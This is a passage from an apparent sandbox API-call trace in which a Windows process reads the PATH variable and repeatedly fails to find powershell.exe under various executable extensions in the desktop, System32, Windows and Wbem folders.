nFileSizeLow=0x0)) returned 0 [0057.041] CreateFileW (lpFileName="powershell.exe.jse" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.041] GetFileAttributesExW (in: lpFileName="powershell.exe.wsf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.041] CreateFileW (lpFileName="powershell.exe.wsf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.041] GetFileAttributesExW (in: lpFileName="powershell.exe.wsh" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.041] CreateFileW (lpFileName="powershell.exe.wsh" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.041] GetFileAttributesExW (in: lpFileName="powershell.exe.msc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.041] CreateFileW (lpFileName="powershell.exe.msc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.041] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0xc0000de1a0, nSize=0x64 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0057.041] VirtualAlloc (lpAddress=0xc0000f6000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000f6000 [0057.041] VirtualAlloc (lpAddress=0xc0000f8000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000f8000 [0057.042] VirtualAlloc (lpAddress=0xc0000fa000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000fa000 [0057.042] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe" (normalized: "c:\\windows\\system32\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.042] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe" (normalized: "c:\\windows\\system32\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.042] VirtualAlloc (lpAddress=0xc0000fc000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000fc000 [0057.043] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.com" (normalized: "c:\\windows\\system32\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.043] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.com" (normalized: "c:\\windows\\system32\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.043] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.043] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.043] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.043] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.043] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.043] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.044] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.044] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.044] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.044] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.044] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.js" (normalized: "c:\\windows\\system32\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.044] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.js" (normalized: "c:\\windows\\system32\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.044] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.044] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.044] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.044] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.044] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.044] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.044] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.045] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.045] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe" (normalized: "c:\\windows\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.045] CreateFileW (lpFileName="C:\\Windows\\powershell.exe" (normalized: "c:\\windows\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.045] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.com" (normalized: "c:\\windows\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.045] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.com" (normalized: "c:\\windows\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.045] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.exe" (normalized: "c:\\windows\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.045] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.exe" (normalized: "c:\\windows\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.045] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.bat" (normalized: "c:\\windows\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.045] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.bat" (normalized: "c:\\windows\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.046] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.cmd" (normalized: "c:\\windows\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.046] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.cmd" (normalized: "c:\\windows\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.046] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.vbs" (normalized: "c:\\windows\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.046] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.vbs" (normalized: "c:\\windows\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.046] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.vbe" (normalized: "c:\\windows\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.046] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.vbe" (normalized: "c:\\windows\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.046] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.js" (normalized: "c:\\windows\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.046] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.js" (normalized: "c:\\windows\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.046] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.jse" (normalized: "c:\\windows\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.046] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.jse" (normalized: "c:\\windows\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.047] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.wsf" (normalized: "c:\\windows\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.047] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.wsf" (normalized: "c:\\windows\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.047] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.wsh" (normalized: "c:\\windows\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.047] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.wsh" (normalized: "c:\\windows\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.047] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.msc" (normalized: "c:\\windows\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.047] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.msc" (normalized: "c:\\windows\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.047] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.047] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.048] VirtualAlloc (lpAddress=0xc0000fe000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000fe000 [0057.048] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.com" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.048] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.com" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.048] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.048] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, 